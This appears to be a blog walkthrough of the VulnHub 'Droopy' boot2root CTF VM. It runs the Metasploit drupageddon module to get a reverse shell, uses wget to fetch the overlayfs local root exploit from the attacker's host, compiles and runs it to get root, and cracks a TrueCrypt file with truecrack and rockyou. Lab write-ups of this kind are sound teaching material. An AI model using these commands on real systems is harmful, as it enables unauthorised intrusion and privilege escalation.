Droopy: v0.2

Location

CTF challenge @ vulnhub.com

Description

Welcome to Droopy. This is a beginner’s boot2root/CTF VM.
The VM is set to grab a DHCP lease on boot.

There’s 2 hints I would offer you:
1.) Grab a copy of the rockyou wordlist.
2.) It’s fun to read other people’s email.

Enumeration

It’s a beginner’s boot2root. So let’s see how fast I can get the final flag with this CTF.
Like always let’s find out what ports are open for business.

 nmap -A -sV -T4 -p- 192.168.56.102

Port 80 is open and a quick look shows that there’s a list available with directories at robots.txt.

nmap

The site runs on Drupal a Content Management System (CMS).
Let’s scan the site with ‘droopescan’. This program isn’t standard in Kali and if you want to install it apt-get install droopescan won’t do. Instead use pip install droopescan.

droopescan

Exploitation

After checking exploit-db I saw that there were a lot of exploits to use. I know there are a lot of good working exploits that I can run myself with a python script, that will grant me administrator access. But I also know that I have to manually change the settings that way, so I can run a PHP script (my favorite is the one from pentestmonkey) and let the script run by visiting the page. That’s why I choose to use an exploit that is offered in Metasploit (drupageddon) and get a reverse shell the easy way (time’s a wasting :)).

use exploit/multi/http/drupal_drupageddon
set RHOST 192.168.56.2
set LHOST 192.168.56.102
exploit

msf

Escalating privileges

And I’m in. Time for a proper shell and to see what the machine is running on.

shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@droopy:/etc$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION=”Ubuntu 14.04.1 LTS”
NAME=”Ubuntu”
VERSION=”14.04.1 LTS, Trusty Tahr”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 14.04.1 LTS”
VERSION_ID=”14.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”

It seems the machine runs on Ubuntu 14.04. I know this version has an exploit in the overlayfs file system. But to use this exploit I need the use of gcc and wget. It seems after a quick check both are at my disposal. I copied the script for the ‘overlayfs’ Local Root Exploit (https://www.exploit-db.com/exploits/39166/) and now it’s time to get it over to the other machine.

wget http://192.168.56.102/overlayfs.c
–2016-08-01 23:52:16– http://192.168.56.102/overlayfs.c
Connecting to 192.168.56.102:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘overlayfs.c’

100%[======================================>] 4,968 –.-K/s in 0s

2016-08-01 23:52:17 (198 MB/s) – ‘overlayfs.c’ saved [4968/4968]

www-data@droopy:/tmp$ gcc overlayfs.c -o overlayfs
gcc overlayfs.c -o overlayfs
www-data@droopy:/tmp$ chmod 777 overlayfs
chmod 777 overlayfs
www-data@droopy:/tmp$ ./overlayfs
./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root

Decryption

After looking round in the system I noticed that there was no flag.txt in the root directory, but a truecrypt file named dave. Like the hint said, you need the rockyou wordlist.
Time to get cracking. I downloaded the truecrypt file with meterpreter to my machine for faster cracking attempt.

truecrack -t dave.tc -w /usr/share/wordlists/rockyou.txt

This is gonna take some time. So in the meantime I’m going to further explore the system to see what can be found.

Looks like there is just one user ‘gsuser’. Nothing really in the home directory. I found a mail in /var/www-mail.

mail.JPG

I already found the encrypted file and truecrack is running as we speak. But there are some things in this mail that can possibly speed up truecrack. There is a mention about an academy and a song from The Jam. Let’s start with academy fist.

grep -i “*.academy.*” rockyou.txt > newlist.txt

got a smaller list with only 240 words. Let’s try it with truecrack. Because I don’t know which hashtype was used, I start with the standard option ripemd160, then sha512 and finally whirlpool.

truecrack -t dave.tc -w newlist.txt -k ripemd160

Nothing 😦

truecrack -t dave.tc -w newlist.txt -k sha512

truecrack

Mounting and exploring

Nice. Now it’s time to mount the file and check what’s inside?
For mounting the truecrypt file I’ll be using Veracrypt.

veracrypt.JPG

ls -alR

flag.JPG

The final flag

Looks there is the flag inside a hidden directory.

finish

Alright. Nice challenge from which I’ve learned a few new tricks.
Timer stopped at 4 hours. Mostly thanks to the truecrypt file.

 

Advertenties